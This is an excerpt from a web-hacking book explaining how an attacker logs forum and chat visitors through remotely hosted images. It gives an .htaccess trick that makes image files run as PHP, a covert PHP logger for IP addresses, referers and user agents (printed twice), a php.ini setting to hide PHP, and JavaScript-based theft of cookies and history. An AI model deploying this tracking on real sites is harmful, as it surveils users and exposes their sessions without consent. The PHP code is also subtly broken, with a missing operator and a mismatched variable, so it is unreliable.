Collecting Statistics | Hacker Web Exploition Uncovered

The XSS vulnerability can be exploited for collecting statistics about the visitors of vulnerable pages. Here, I primarily mean the XSS vulnerability of the first type, in which unfiltered data are displayed to third-party users.

In the simplest case, an attacker doesn't need the vulnerability. He or she would be satisfied if the system allowed its users to insert images from other servers into their messages. The attacker would simply insert images located on a server under his or her control. When an image is requested from that server, it will execute malicious code (in PHP or Perl), saving some statistical data and sending back an appropriate header and the image. Thus, statistics will be collected transparently for the system and its users.

Such statistics can be collected in forums and chats that allow participants to insert images into their messages. Statistics can be collected in the following elements that are of interest to the attacker:

IP addresses of visitors. Even when the system (a forum or a chat) doesn't show their IP addresses, the attacker can find out them. In addition, if a user doesn't visit the system through an anonymous proxy server, the attacker can obtain this user 's actual IP address.
The time of visits . In addition to IP addresses, the attacker can collect the times, at which users visit the system. This can allow the attacker to find out which user owns a certain IP address.
HTTP Referer . When loading images, some browsers send the Referer header of an HTTP request that includes the original URL of the page containing the image. Thus, the attacker can collect information about which pages are visited and who visits them. It can also be used to find out, which user owns a certain IP address. In addition, the attack can intercept session IDs and other data sent with the HTTP GET method. Sometimes, it is possible to disclose the URLs of private parts of the site or system.
The browser type. The User-Agent field of the header in an HTTP request contains information about the browser and the operating system of the user. The attacker can save this value to discover what browsers the users of the system have and in what operating systems they work.

So, the attacker can collect a lot of interesting information about the users of a system; the system won't even notice. What's more, it would be impossible for anyone who doesn't have access to the internals of the malicious server to prove that the statistics were collected intentionally.

The attacker can configure his or her server so that it doesn't return a requested GIF or JPG image but passes control to a script. To implement transparent actions, the script should return the image with appropriate headers.

For example, you can make the Apache server execute GIF and JPG files as PHP scripts: Just add the following lines to the configuration file of the desired directory.

The lines should be added to the . htaccess file located in the same directory as the GIF or JPG files:

 RemoveHandler .jpg .gif .png .bmp .jpeg    AddType application/x-httpd-php .gif .png .bmp .jpeg .jpg

As a result, files with the JPG, GIF, PNG, BMP, and JPEG extensions will be executed as PHP scripts when requested using HTTP.

Consider an example of a script that saves the specified information in a file and then displays an image with appropriate headers.

http://localhost/5/image.gif
<? $logfile="log.txt"; $imgfile="img.gif"; // This file can have any extension because it is // accessed not through HTTP but as a component // of the server's file system. $limiter=" : "; // Field delimiter $ip=$_SERVER['REMOTE_ADDR']; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) $ip.="({$_SERVER[HTTP_X_FORWARDED_FOR]})"; if(!empty($_SERVER['HTTP_CLIENT_IP'])) $ip.="({$_SERVER[HTTP_CLIENT_IP]})"; if(!empty($_SERVER['HTTP_VIA'])) $ip.="({$_SERVER[HTTP_VIA]})"; // The preceding statements collect statistics about an IP address; // if the user doesn't use an anonymous proxy server, the actual // IP address is revealed. $date=date("Y-m-d H:i:s"); $referer=$_SERVER['HTTP_REFERER']; $agent=$_SERVER['HTTP_USER_AGENT']; $text="[".$date."]". $limiter."[".$ip."]" $limiter."[".$referer."]". $limiter."[".$agent."]". "\r\n"; $f=fopen($logfile, "a"); fwrite($f, $text); fclose($f); header("Content-type: image/jpeg"); $f1=fopen($imgfile, "r"); while($s=fread($fl, 1024)) echo $s; fclose($f1); ?>

http://localhost/5/image.gif

 <? $logfile="log.txt"; $imgfile="img.gif"; // This file can have any extension because it is                     // accessed not through HTTP but as a component                     // of the server's file system. $limiter=" : "; // Field delimiter $ip=$_SERVER['REMOTE_ADDR']; if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))   $ip.="({$_SERVER[HTTP_X_FORWARDED_FOR]})"; if(!empty($_SERVER['HTTP_CLIENT_IP']))   $ip.="({$_SERVER[HTTP_CLIENT_IP]})"; if(!empty($_SERVER['HTTP_VIA']))   $ip.="({$_SERVER[HTTP_VIA]})"; // The preceding statements collect statistics about an IP address; // if the user doesn't use an anonymous proxy server, the actual // IP address is revealed. $date=date("Y-m-d H:i:s"); $referer=$_SERVER['HTTP_REFERER']; $agent=$_SERVER['HTTP_USER_AGENT']; $text="[".$date."]".        $limiter."[".$ip."]"        $limiter."[".$referer."]".        $limiter."[".$agent."]".        "\r\n"; $f=fopen($logfile, "a"); fwrite($f, $text); fclose($f); header("Content-type: image/jpeg"); $f1=fopen($imgfile, "r"); while($s=fread($fl, 1024)) echo $s; fclose($f1); ?>

To conceal that the file is processed by the PHP interpreter, add the following line to the PHP.INI configuration file:

 expose_php  =  Off

As a result, the PHP interpreter won't be exposed when the HTTP header of the response is sent.

Note that this type of attack can be launched even without the XSS vulnerability on the target server. When collecting statistics, the attacker uses only documented features of the system.

If the attacker adds JavaScript to his or her statistics collecting system, it will become even more powerful. The attacker will be able to collect statistics about all browser parameters available with JavaScript tools. These can be the following parameters:

Cookies in the context of the target site. I told you earlier what problems can emerge when users' cookies are disclosed.
The contents of the history and referrer parameters of the browser. JavaScript offers programmers methods for accessing these browser parameters. The history includes the URLs of all pages visited by the user during the current session. This can contain information of interest to the attacker, for example, URLs of private pages, session IDs, and other confidential data. The referer parameter can also contain private information.
Local time. The local time allows the attacker to judge the time zone and, therefore, the physical location of the user. This can confirm or refute location information obtained from IP addresses.
Information about the internals of the target system. By having information about the target system (e.g., what software is installed in it), the attacker can plan an attack on it.
Any other information of interest to the attacker and accessible using JavaScript methods.